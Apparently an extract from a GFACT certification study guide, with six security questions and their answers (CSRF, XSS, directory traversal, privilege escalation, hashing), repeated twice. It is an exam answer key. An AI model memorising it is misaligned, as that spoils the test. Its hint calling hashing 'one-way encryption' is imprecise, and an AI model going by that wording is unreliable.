GFACT Certification Exam Questions and Answers
Question 1
(B1, Pg135) In which directory are Linux logs generally found?
A)var
B)bin
C)boot
D)mnt
HINT The "blank" folder contains system files that tend to increase in size over time (hence it's a "blank" size folder). Things
like log files, the mail directory, and so on, go here.
Correct Answer
var
Page 1 of 73
,Question 2
(B3, Pg169) What is a requirement for cross-site request forgery to work?
A) The victim must be authenticated with the target site
B) The Attacker must have root privileges on the victim's system
C) The victim must be a member of the IIS_USER group
D) The attacker must steal the victim's cookie
HINT CSRF involves an authenticated user clicking on a link that an attacker plants. This link will cause the victim's browser
to perform an action using their authenticated credentials.
Correct Answer
The victim must be authenticated with the target site
Question 3
(B3, Pg173) What is the best way to mitigate directory traversal attack?
Correct Answer
It is to not use user input when making file system calls
Page 2 of 73
,Question 4
(B3, Pg22) Which of the following is a form of one-way encryption?
A) Hashing
B)Symmetric
C)Substitution
D)Asymmetric
HINT "Blank" is a third form of encryption, but its uses are a bit more niche. The third form of encryption is called hashing:
a form of one-way encryption. That means, once data is encrypted, the process can not be reversed to go from the
encrypted data back to the plaintext.
There are some properties of hashing that make it incredibly useful. The same plain text put through the same hashing
algorithm will always produce the same encrypted data. However, if even one bit of the plaintext is changed, the resulting
hash will be completely different. Similarly, with a good hashing algorithm, two different pieces of plaintext can not work
out to the same hash
Correct Answer
Hashing
Page 3 of 73
, Question 5
What are some of the ways to perform privilege escalation?
A) Exploiting Services
B) Exploiting the Kernel
C) SUID Files
D) All of the above
Correct Answer
All of the above
Question 6
(B3, Pg162) Which of the following is a common result of a reflected cross-site scripting attack?
A)Tricking a user into making an authenticated transaction
B)Sending a website user's session cookie to an attacker
C) Embedding the attacker's malware in web application source code
D) Stealing password hashes from a website's back end database
HINT It may be under the session guessing section, but if you read further into it, you will see where it mentions XSS
attack.
Correct Answer
Sending a website user's session cookie to an attacker
Page 4 of 73
Question 1
(B1, Pg135) In which directory are Linux logs generally found?
A)var
B)bin
C)boot
D)mnt
HINT The "blank" folder contains system files that tend to increase in size over time (hence it's a "blank" size folder). Things
like log files, the mail directory, and so on, go here.
Correct Answer
var
Page 1 of 73
,Question 2
(B3, Pg169) What is a requirement for cross-site request forgery to work?
A) The victim must be authenticated with the target site
B) The Attacker must have root privileges on the victim's system
C) The victim must be a member of the IIS_USER group
D) The attacker must steal the victim's cookie
HINT CSRF involves an authenticated user clicking on a link that an attacker plants. This link will cause the victim's browser
to perform an action using their authenticated credentials.
Correct Answer
The victim must be authenticated with the target site
Question 3
(B3, Pg173) What is the best way to mitigate directory traversal attack?
Correct Answer
It is to not use user input when making file system calls
Page 2 of 73
,Question 4
(B3, Pg22) Which of the following is a form of one-way encryption?
A) Hashing
B)Symmetric
C)Substitution
D)Asymmetric
HINT "Blank" is a third form of encryption, but its uses are a bit more niche. The third form of encryption is called hashing:
a form of one-way encryption. That means, once data is encrypted, the process can not be reversed to go from the
encrypted data back to the plaintext.
There are some properties of hashing that make it incredibly useful. The same plain text put through the same hashing
algorithm will always produce the same encrypted data. However, if even one bit of the plaintext is changed, the resulting
hash will be completely different. Similarly, with a good hashing algorithm, two different pieces of plaintext can not work
out to the same hash
Correct Answer
Hashing
Page 3 of 73
, Question 5
What are some of the ways to perform privilege escalation?
A) Exploiting Services
B) Exploiting the Kernel
C) SUID Files
D) All of the above
Correct Answer
All of the above
Question 6
(B3, Pg162) Which of the following is a common result of a reflected cross-site scripting attack?
A)Tricking a user into making an authenticated transaction
B)Sending a website user's session cookie to an attacker
C) Embedding the attacker's malware in web application source code
D) Stealing password hashes from a website's back end database
HINT It may be under the session guessing section, but if you read further into it, you will see where it mentions XSS
attack.
Correct Answer
Sending a website user's session cookie to an attacker
Page 4 of 73
